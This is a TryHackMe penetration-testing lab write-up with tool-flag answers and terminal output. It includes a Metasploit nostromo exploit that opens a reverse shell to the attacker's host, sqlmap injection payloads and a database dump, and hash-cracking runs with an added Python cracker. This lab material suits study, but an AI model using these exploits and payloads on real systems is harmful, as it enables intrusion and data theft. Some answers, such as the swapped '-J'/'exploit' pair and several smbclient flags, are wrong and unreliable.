CC: Pen Testing

Date: 16 May 2021

Author: Dhilip Sanjay S


Click Here to go to the TryHackMe room.

Nmap (Network Utilities)

What does nmap stand for?

  • Answer: Network Mapper

How do you specify which port(s) to scan?

  • Answer: -p

How do you do a "ping scan" (just tests whether the host(s) is up)?

  • Answer: -sn

What is the flag for a UDP scan?

  • Answer: -sU

How do you run default scripts?

  • Answer: -sC

How do you enable "aggressive mode" (enables OS detection, version detection, script scanning, and traceroute)?

  • Answer: -A

What flag enables OS detection?

  • Answer: -O

How do you get the versions of services running on the target machine?

  • Answer: -sV

How many ports are open on the machine?

  • Answer: 1

  • Steps to Reproduce:

$ nmap -sC -sV 10.10.250.203 -oN nmap-task

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 17:44 IST
Nmap scan report for 10.10.250.203
Host is up (0.15s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

What service is running on the machine?

  • Answer: Apache

What is the version of the service?

  • Answer: 2.4.18

What is the output of the http-title script (included in the default scripts)?

  • Answer: Apache2 Ubuntu Default Page: It works


Netcat (Network Utilities)

  • Netcat aka nc is an extremely versatile tool. It allows users to connect to specific ports and send and receive data. It also allows machines to receive data and connections on specific ports, which makes nc a very popular tool to gain a Reverse Shell.

How do you listen for connections?

  • Answer: -l

How do you enable verbose mode (allows you to see who connected to you)?

  • Answer: -v

How do you specify a port to listen on?

  • Answer: -p

How do you specify which program to execute after you connect to a host (one of the most infamous options)?

  • Answer: -e

How do you connect to UDP ports?

  • Answer: -u


Gobuster (Web Enumeration)

How do you specify directory/file brute forcing mode?

  • Answer: dir

How do you specify DNS bruteforcing mode?

  • Answer: dns

What flag sets extensions to be used?

  • Answer: -x

What flag sets a wordlist to be used?

  • Answer: -w

How do you set the username for basic authentication (if the directory requires a username/password)?

  • Answer: -U

How do you set the password for basic authentication?

  • Answer: -P

How do you set which status codes gobuster will interpret as valid?

  • Answer: -s

How do you skip SSL certificate verification?

  • Answer: -k

How do you specify a User-Agent?

  • Answer: -a

How do you specify a HTTP header?

  • Answer: -H

What flag sets the URL to bruteforce?

  • Answer: -u

What is the name of the hidden directory?

  • Answer: secret

  • Steps to Reproduce:

$ gobuster dir -u http://10.10.65.181 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.65.181
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/16 17:50:27 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 11321]
/secret               (Status: 301) [Size: 313] [--> http://10.10.65.181/secret/]
/server-status        (Status: 403) [Size: 277] 

What is the name of the hidden file with the extension xxa?

  • Answer: password

  • Steps to Reproduce:

$ gobuster dir -u http://10.10.65.181 -w /usr/share/wordlists/dirb/common.txt -x xxa
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.65.181
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              xxa
[+] Timeout:                 10s
===============================================================
2021/05/16 17:52:44 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.hta.xxa             (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess.xxa        (Status: 403) [Size: 277]
/.htpasswd.xxa        (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 11321]
/password.xxa         (Status: 200) [Size: 12]   
/secret               (Status: 301) [Size: 313] [--> http://10.10.65.181/secret/]
/server-status        (Status: 403) [Size: 277]                                  
                                                                                 
===============================================================
2021/05/16 17:55:07 Finished
===============================================================

Nikto (Web Enumeration)

How do you specify which host to use?

  • Answer: -h

What flag disables SSL?

  • Answer: -nossl

How do you force SSL?

  • Answer: -ssl

How do you specify authentication (username + password)?

  • Answer: -id

How do you select which plugin to use?

  • Answer: -plugins

Which plugin checks whether you can enumerate Apache users?

  • Answer: apacheusers

$ nikto -list-plugins | grep apache
Plugin: apache_expect_xss
Plugin: apacheusers
  (expanded) = "ms10_070;apache_expect_xss;httpoptions;cookies;shellshock;strutshock;sitefiles;origin_reflection;clientaccesspolicy;content_search;ssl;dir_traversal;multiple_index;report_nbe;auth;msgs;headers;favicon;domino;negotiate;outdated;put_del_test;fileops;drupal;parked;report_html;dishwasher;robots;report_text;cgi;report_json;report_csv;report_sqlg;report_xml;docker_registry;tests(report:500);paths;apacheusers"
 @@ALL = "strutshock;put_del_test;multiple_index;clientaccesspolicy;report_html;embedded;report_text;siebel;cookies;drupal;sitefiles;docker_registry;tests;apache_expect_xss;report_json;domino;report_nbe;report_sqlg;favicon;fileops;dictionary;negotiate;origin_reflection;content_search;shellshock;robots;outdated;auth;apacheusers;dir_traversal;dishwasher;ssl;ms10_070;httpoptions;paths;parked;report_csv;headers;cgi;report_xml;msgs"

How do you update the plugin list?

  • Answer: -update

How do you list all possible plugins to use?

  • Answer: -list-plugins


Metasploit - Setting Up

  • Metasploit is one of the most popular penetration testing frameworks around. It contains a large database of almost every major CVE, which you can easily use against a machine.

What command allows you to search modules?

  • Answer: search

How do you select a module?

  • Answer: use

How do you display information about a specific module?

  • Answer: info

How do you list options that you can set?

  • Answer: options

What command lets you view advanced options for a specific module?

  • Answer: advanced

How do you show options in a specific category?

  • Answer: show


Metasploit - selecting a module

How do you select the eternalblue module?

  • Answer: use exploit/windows/smb/ms17_010_eternalblue

What option allows you to select the target host(s)?

  • Answer: RHOSTS

How do you set the target port?

  • Answer: RPORT

What command allows you to set options?

  • Answer: set

How would you set SMBPass to "username"?

  • Answer: set SMBPass username

How would you set the SMBUser to "password"?

  • Answer: set SMBUser password

What option sets the architecture to be exploited?

  • Answer: arch

What option sets the payload to be sent to the target machine?

  • Answer: payload

Once you've finished setting all the required options, how do you run the exploit?

  • Answer: -J

What flag do you set if you want the exploit to run in the foreground?

  • Answer: exploit

How do you list all current sessions?

  • Answer: sessions

What flag allows you to go into interactive mode with a session? ("drops you either into a meterpreter or regular shell")

  • Answer: -i


Metasploit - meterpreter

What command allows you to download files from the machine?

  • Answer: download

What command allows you to upload files to the machine?

  • Answer: upload

How do you list all running processes?

  • Answer: ps

How do you change processes on the victim host? (Ideally it will allow you to change users and gain the perms associated with that user)

  • Answer: migrate

What command lists files in the current directory on the remote machine?

  • Answer: ls

How do you execute a command on the remote host?

  • Answer: execute

What command starts an interactive shell on the remote host?

  • Answer: shell

How do you find files on the target host? (Similar function to the linux command "find")

  • Answer: search

How do you get the output of a file on the remote host?

  • Answer: cat

How do you put a meterpreter shell into "background mode" (allows you to run other msf modules while keeping the meterpreter shell as a session)?

  • Answer: background


Metasploit - Final Walkthrough

Select the module that needs to be exploited

  • Answer: use exploit/multi/http/nostromo_code_exec

What variable do you need to set, to select the remote host?

  • Answer: RHOSTS

How do you set the port to 80?

  • Answer: set RPORT 80

How do you set the listening address?

  • Answer: LHOST

Exploit the machine!

msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/http/nostromo_code_exec
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.237.243
RHOSTS => 10.10.237.243
msf6 exploit(multi/http/nostromo_code_exec) > set rport 80
rport => 80
msf6 exploit(multi/http/nostromo_code_exec) > set LHOST 10.17.7.91
LHOST => 10.17.7.91
msf6 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.237.243    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'f
                                       ile:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an addre
                                       ss on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.17.7.91       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf6 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.17.7.91:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.17.7.91:4444 -> 10.10.237.243:54484) at 2021-05-16 18:26:23 +0530

shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /bin/bash

_nostromo@ubuntu:/bin$ id    
id
uid=1001(_nostromo) gid=1001(_nostromo) groups=1001(_nostromo)

What is the name of the secret directory in the /var/nostromo/htdocs directory?

  • Answer: s3cretd1r

_nostromo@ubuntu:/bin$ cd /var/nostromo/htdocs
cd /var/nostromo/htdocs

_nostromo@ubuntu:/var/nostromo/htdocs$ ls -la
ls -la
total 20
drwxr-xr-x 3 _nostromo _nostromo 4096 Dec  5  2019 .
drwxr-xr-x 6 _nostromo _nostromo 4096 Dec  5  2019 ..
-rw-r--r-- 1 _nostromo _nostromo  564 Dec  5  2019 index.html
-rw-r--r-- 1 _nostromo _nostromo 1827 Dec  5  2019 nostromo.gif
drwxr-xr-x 2 root      root      4096 Dec  5  2019 s3cretd1r

What are the contents of the file inside of the directory?

  • Answer: Woohoo!

_nostromo@ubuntu:/var/nostromo/htdocs$ cd s3cretd1r
cd s3cretd1r

_nostromo@ubuntu:/var/nostromo/htdocs/s3cretd1r$ ls -la
ls -la
total 12
drwxr-xr-x 2 root      root      4096 Dec  5  2019 .
drwxr-xr-x 3 _nostromo _nostromo 4096 Dec  5  2019 ..
-rw-r--r-- 1 root      root         8 Dec  5  2019 nice

_nostromo@ubuntu:/var/nostromo/htdocs/s3cretd1r$ cat nice
cat nice
Woohoo!

Hashcat - Hash Cracking

What flag sets the mode?

  • Answer: -m

What flag sets the "attack mode"?

  • Answer: -a

What is the attack mode number for Brute-force?

  • Answer: 3

What is the mode number for SHA3-512?

  • Answer: 17600

Crack This Hash: 56ab24c15b72a457069c5ea42fcfc640

  • Answer: happy

  • Steps to Reproduce:

    • Since it is an MD5 hash, the -m option can be omitted: hashcat's default hash mode is 0, which is MD5.

hashcat 56ab24c15b72a457069c5ea42fcfc640 /usr/share/wordlists/rockyou.txt 
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2886/2950 MB (1024 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

56ab24c15b72a457069c5ea42fcfc640:happy           
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 56ab24c15b72a457069c5ea42fcfc640
Time.Started.....: Sun May 16 18:36:29 2021 (0 secs)
Time.Estimated...: Sun May 16 18:36:29 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   255.2 kH/s (0.19ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1024/14344385 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> bethany

Crack this hash: 4bc9ae2b9236c2ad02d81491dcb51d5f

  • Answer: nootnoot

  • Steps to Reproduce:

hashcat -m 900 4bc9ae2b9236c2ad02d81491dcb51d5f /usr/share/wordlists/rockyou.txt 
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2886/2950 MB (1024 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

4bc9ae2b9236c2ad02d81491dcb51d5f:nootnoot        
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD4
Hash.Target......: 4bc9ae2b9236c2ad02d81491dcb51d5f
Time.Started.....: Sun May 16 18:37:15 2021 (1 sec)
Time.Estimated...: Sun May 16 18:37:16 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2882.2 kH/s (0.15ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 838656/14344385 (5.85%)
Rejected.........: 0/838656 (0.00%)
Restore.Point....: 837632/14344385 (5.84%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: notsayin -> nokia_5200

JohnTheRipper - Hash Cracking

What flag lets you specify which wordlist to use?

  • Answer: -wordlist

What flag lets you specify which hash format (e.g. MD5, SHA1, etc.) to use?

  • Answer: --FORMAT

How do you specify which rule to use?

  • Answer: --rules

Crack this hash: 5d41402abc4b2a76b9719d911017c592

  • Answer: hello

  • Steps to Reproduce:

$ john -wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 john-md5.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (?)
1g 0:00:00:00 DONE (2021-05-16 18:51) 20.00g/s 7680p/s 7680c/s 7680C/s 123456..michael1
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

Crack this hash: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

  • Answer: password

  • Steps to Reproduce:

$ john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt john-sha1.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (?)
1g 0:00:00:00 DONE (2021-05-16 18:56) 50.00g/s 400.0p/s 400.0c/s 400.0C/s 123456..rockyou
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
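The hashcat and John steps above both boil down to the same loop: hash every wordlist candidate with the selected algorithm and compare. The point of -m / --format is that the digest alone does not name the algorithm; the write-up's second hash is 32 hex characters like an MD5, yet only mode 900 (MD4) cracks it. This added example (not from the original write-up) reproduces that loop in pure Python with a constructed six-word list standing in for rockyou.txt; mode numbers 0 (MD5) and 900 (MD4) come from the write-up, and 100 for SHA1 is hashcat's real mode for that algorithm. MD4 is implemented inline because hashlib often lacks it under OpenSSL 3.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF


def _lrot(x, n):
    """Rotate a 32-bit word left by n bits."""
    x &= MASK
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), used instead of hashlib.new("md4") because
    OpenSSL 3 builds often ship MD4 only in the legacy provider."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # (round function, additive constant, message-word order, shift amounts)
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = _lrot(a + fn(b, c, d) + x[k] + const, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


# Hash functions keyed by hashcat mode number: 0 = MD5 (hashcat's default),
# 100 = SHA1, 900 = MD4 (the mode the write-up used for its second hash).
HASH_MODES = {
    0: ("MD5", lambda b: hashlib.md5(b).digest()),
    100: ("SHA1", lambda b: hashlib.sha1(b).digest()),
    900: ("MD4", md4),
}

# Constructed mini-wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "hello", "nootnoot", "happy", "bethany"]


def candidate_modes(hex_digest: str) -> list:
    """Modes whose digest length matches the target. Length alone cannot
    separate MD5 from MD4 (both 16 bytes), which is why -m / --format exist."""
    size = len(hex_digest) // 2
    return [m for m, (_, fn) in HASH_MODES.items() if len(fn(b"")) == size]


def crack(hex_digest: str, wordlist, mode: int = 0):
    """Dictionary attack: hash each candidate with the chosen mode and compare
    the raw digest. Returns the matching word, or None if the list is exhausted."""
    _, fn = HASH_MODES[mode]
    target = bytes.fromhex(hex_digest)
    for word in wordlist:
        if fn(word.encode()) == target:
            return word
    return None


if __name__ == "__main__":
    # The write-up's second hash: MD5-sized, but only the MD4 mode finds it.
    h2 = "4bc9ae2b9236c2ad02d81491dcb51d5f"
    for mode in candidate_modes(h2):
        print(HASH_MODES[mode][0], "->", crack(h2, WORDLIST, mode))
```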

SQLMAP - SQL Injection

How do you specify which URL to check?

  • Answer: -u

What about which google dork to use?

  • Answer: -g

How do you select (lol) which parameter to use? (Example: in the URL http://ex.com?test=1 the parameter would be test.)

  • Answer: -p

What flag sets which database is in the target host's backend? (Example: if the flag is set to mysql, then sqlmap will only test MySQL injections.)

  • Answer: --dbms

How do you select the level of depth sqlmap should use (higher = more accurate and more tests in general)?

  • Answer: --level

How do you dump the table entries of the database?

  • Answer: --dump

Which flag sets which db to enumerate?

  • Answer: -D

Which flag sets which table to enumerate?

  • Answer: -T

Which flag sets which column to enumerate?

  • Answer: -C

How do you ask sqlmap to try to get an interactive os-shell?

  • Answer: --os-shell

What flag dumps all data from every table?

  • Answer: --dump-all


How many types of SQLi is the site vulnerable to?

  • Answer: 3

    • Type: boolean-based blind

    • Type: error-based

    • Type: time-based blind

What is the name of the database?

  • Answer: tests

How many tables are in the database?

  • Answer: 2

    • msg

    • lol

What is the value of the flag?

  • Answer: found_me

$ sqlmap -u http://10.10.100.239 -data="msg=hi" --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:19:34 /2021-05-16/

[19:19:34] [INFO] testing connection to the target URL
[19:19:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:19:34] [INFO] testing if the target URL content is stable
[19:19:34] [INFO] target URL content is stable
[19:19:34] [INFO] testing if POST parameter 'msg' is dynamic
[19:19:35] [WARNING] POST parameter 'msg' does not appear to be dynamic
[19:19:35] [INFO] heuristic (basic) test shows that POST parameter 'msg' might be injectable (possible DBMS: 'MySQL')
[19:19:35] [INFO] heuristic (XSS) test shows that POST parameter 'msg' might be vulnerable to cross-site scripting (XSS) attacks
[19:19:35] [INFO] testing for SQL injection on POST parameter 'msg'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) Y
[19:19:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:19:44] [WARNING] reflective value(s) found and filtering out
[19:19:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:19:46] [INFO] testing 'Generic inline queries'
[19:19:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:19:54] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:20:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[19:20:11] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:20:12] [INFO] POST parameter 'msg' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="not")
[19:20:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:20:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:20:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:20:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:20:12] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[19:20:13] [INFO] POST parameter 'msg' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable 
[19:20:13] [INFO] testing 'MySQL inline queries'
[19:20:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:20:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:20:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:20:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:20:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:20:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:20:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:20:24] [INFO] POST parameter 'msg' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[19:20:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:20:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:20:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:20:25] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:20:26] [INFO] target URL appears to have 1 column in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
[19:20:37] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[19:20:40] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[19:20:44] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[19:20:48] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[19:20:52] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[19:20:56] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[19:20:59] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[19:21:04] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[19:21:08] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[19:21:12] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'msg' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 371 HTTP(s) requests:
---
Parameter: msg (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg=hi' RLIKE (SELECT (CASE WHEN (9974=9974) THEN 0x6869 ELSE 0x28 END))-- reEz

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: msg=hi' AND GTID_SUBSET(CONCAT(0x7162627a71,(SELECT (ELT(4925=4925,1))),0x7176766a71),4925)-- TuQC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: msg=hi' AND (SELECT 9956 FROM (SELECT(SLEEP(5)))MMkW)-- EgxH
---
[19:23:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.0.33
back-end DBMS: MySQL >= 5.6
[19:23:29] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[19:23:29] [INFO] fetching current database
[19:23:29] [INFO] retrieved: 'tests'
[19:23:29] [INFO] fetching tables for database: 'tests'
[19:23:29] [INFO] retrieved: 'lol'
[19:23:30] [INFO] retrieved: 'msg'
[19:23:30] [INFO] fetching columns for table 'msg' in database 'tests'
[19:23:30] [INFO] retrieved: 'msg'
[19:23:30] [INFO] retrieved: 'varchar(100)'
[19:23:30] [INFO] fetching entries for table 'msg' in database 'tests'
[19:23:31] [INFO] retrieved: 'msg'
[19:23:31] [INFO] retrieved: 'test'
Database: tests
Table: msg
[2 entries]
+------+
| msg  |
+------+
| msg  |
| test |
+------+

[19:23:31] [INFO] table 'tests.msg' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.100.239/dump/tests/msg.csv'
[19:23:31] [INFO] fetching columns for table 'lol' in database 'tests'
[19:23:31] [INFO] retrieved: 'flag'
[19:23:31] [INFO] retrieved: 'varchar(100)'
[19:23:31] [INFO] fetching entries for table 'lol' in database 'tests'
[19:23:32] [INFO] retrieved: 'found_me'
Database: tests
Table: lol
[1 entry]
+----------+
| flag     |
+----------+
| found_me |
+----------+

[19:23:32] [INFO] table 'tests.lol' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.100.239/dump/tests/lol.csv'
[19:23:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.100.239'

Smbmap - Samba

How do you set the username to authenticate with?

  • Answer: -u

What about the password?

  • Answer: -p

How do you set the host?

  • Answer: -H

What flag runs a command on the server (assuming you have the permissions, that is)?

  • Answer: -x

How do you specify the share to enumerate?

  • Answer: -s

How do you set which domain to enumerate?

  • Answer: -d

What flag downloads a file?

  • Answer: --download

What about uploading one?

  • Answer: --upload

Given the username "admin", the password "password", and the IP "10.10.10.10", how would you run ipconfig on that machine?

  • Answer: smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"


Smbclient - Samba

How do you specify which domain (workgroup) to use when connecting to the host?

  • Answer: -w

How do you specify the IP address of the host?

  • Answer: -l

How do you run the command "ipconfig" on the target machine?

  • Answer: -c "ipconfig"

How do you specify the username to authenticate with?

  • Answer: -u

How do you specify the password to authenticate with?

  • Answer: -p

What flag is set to tell smbclient to not use a password?

  • Answer: -N

While in the interactive prompt, how would you download the file test, assuming it was in the current directory?

  • Answer: get test

In the interactive prompt, how would you upload your /etc/hosts file?

  • Answer: put /etc/hosts


Privilege Escalation

  • Check the useful links


Final Exam

Nmap Enumeration

$ nmap -sC -sV 10.10.17.221 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 19:52 IST
Nmap scan report for 10.10.17.221
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
|   256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
|_  256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
